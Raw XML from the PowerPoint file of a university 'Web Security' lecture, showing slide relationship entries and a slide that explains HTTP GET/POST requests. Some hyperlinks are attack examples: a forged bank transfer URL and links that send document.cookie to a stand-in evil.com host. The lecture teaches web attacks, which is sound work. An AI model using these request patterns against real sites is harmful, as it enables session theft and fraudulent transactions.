<file path=ppt/slides/_rels/slide83.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6.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bank.com/sendmoney?to=DrEvil&amp;amp;amt=100000" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide84.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide85.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://attacker/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://evil.com/steal/document.cookie" TargetMode="Externa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91.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image" Target="../media/image1.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide92.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide93.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56.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide94.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72.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide95.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56.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide96.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74.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpg"/><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1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide97.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://evil.com/?cookie" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bank.com/search.php?term=" TargetMode="Externa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hyperlink" Target="http://evil.com/?cookie" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bank.com/search.php?term=" TargetMode="Externa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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEA293B4-4726-2241-A3D5-D6B8D3AFE7C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2130425"/>
            <a:ext cx="9144000" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400"/>
              <a:t>Web Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15362" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2847648D-F48A-184B-9287-C2139F7CBEB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4572000"/>
            <a:ext cx="9144000" cy="1524000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>Kai Bu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>kaibu@zju.edu.cn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>http://list.zju.edu.cn/kaibu/netsec2022 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C7C6B69-7FC8-E741-8714-6C0FB51559A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8083550" y="0"/>
            <a:ext cx="1060450" cy="939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sz="3600" b="1" dirty="0"/>
              <a:t>05</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1"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623359-5463-E34A-883C-6976F88FEB58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>HTTP Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91E6931B-7BF9-4A4D-A524-D1D9CF40775A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>GET                                           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>request data from a specified resource</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>POST                                           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>send data to a server to create/update a resource</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95D13D80-E8CF-BB4E-B4EC-192765307029}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="917575" y="4781297"/>
            <a:ext cx="7683499" cy="1662114"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4422775" h="2078354">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4422774" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4422774" y="2078037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2078037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{027D611B-67CD-554E-886C-60C64F0B5F88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="4800600"/>
            <a:ext cx="7601519" cy="1298432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="1430"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" i="1" spc="130" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" i="1" spc="220" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" i="1" spc="35" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" i="1" spc="120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="58419" marR="848994" indent="-45720">
              <a:lnSpc>
                <a:spcPts val="1430"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="45"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" i="1" spc="210" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Accept: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>image/gif,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="-55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="240" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>image/x-bitmap,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>image/jpeg,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="75" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>*/*</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="1365"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" i="1" spc="229" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Accept-Language:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="80" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" i="1" spc="225" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Connection:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="80" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="229" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Keep-Alive</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPts val="1430"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" i="1" spc="220" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>User-Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="220" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="180" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Chrome/21.0.1180.75</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="-65" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="220" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(Macintosh;  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="204" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Intel</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="245" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Mac</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="210" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="275" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>10_7_4)</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="1365"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" i="1" spc="204" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Host:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="80" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="254" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.safebank.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="1435"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" i="1" spc="190" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="190" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="65" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="225" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.google.com?q=dingbats</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10EC8139-0905-EA4D-A1B4-B9E518A6306F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828674" y="4249865"/>
            <a:ext cx="3352800" cy="299720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
